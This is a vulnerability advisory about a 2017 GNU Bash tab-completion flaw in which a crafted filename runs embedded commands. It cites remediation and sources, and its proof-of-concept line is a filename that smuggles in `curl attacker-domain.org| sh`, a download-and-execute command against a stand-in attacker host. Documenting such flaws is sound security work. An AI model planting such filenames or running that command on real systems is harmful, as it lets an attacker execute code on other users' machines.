Main Vulnerability Database Vulnerabilities #VU5653

Improper filename handling in Bash - #VU5653

Published: February 7, 2017

Vulnerability identifier: #VU5653

CSH Severity: Low

CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/U:Clear

CVE-ID: N/A

CWE-ID: CWE-78

Exploitation vector: Local access

Exploit availability: No public exploit available

Vendor: GNU

Affected software:
Bash

Detailed vulnerability description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to incorrect handling of filenames, containing certain characters in GNU Bash. A local user can create a filename with double quote character followed by OS commands and execute them with privileges of the current user. The vulnerability is triggered automatically, once the victim starts typing the name of desired file and presses the Tab key to autocomplete the name of the file.

PoC-code:

	 some-very-long-string-nobody-is-going-to-type"`curl attacker-domain.org| sh`

Successful exploitation of the vulnerability may allow a local user with ability to place files on the filesystem to execute arbitrary OS commands with privileges of the current user.

Remediation

Install update from vendor’s GIT repository:

http://git.savannah.gnu.org/cgit/bash.git/commit/?id=4f747edc625815f449048579f6e65869914dd715

Sources

https://github.com/jheyens/bash_completion_vuln/raw/master/2017-01-17.bash_completion_report.pdf

Improper filename handling in Bash - #VU5653

Detailed vulnerability description

Remediation

Sources

Please verify you're human